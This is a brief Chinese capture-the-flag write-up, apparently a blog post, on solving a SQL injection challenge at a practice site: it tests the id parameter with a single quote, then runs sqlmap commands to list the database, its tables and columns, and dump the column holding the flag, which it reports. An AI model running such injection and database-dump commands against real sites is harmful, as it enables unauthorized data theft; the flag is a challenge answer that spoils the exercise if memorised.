2018-12-08

首先看这道题,打开链接如图


此题的url为


发现结尾有id的属性值,手工检测是否存在sql注入(网上查了用经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞),结果如下


发现果然有一个sql注入,于是复制url用sqlmap爆一下数据库,运用命令# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db


发现是my_db数据库,于是继续运用命令# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables查看一下表


发现有一个thiskey,flag应该就在这里面,于是继续查看一下列# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns


然后继续用# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump


最后得到key:whatiMyD91dump

你可能感兴趣的:(2018-12-08)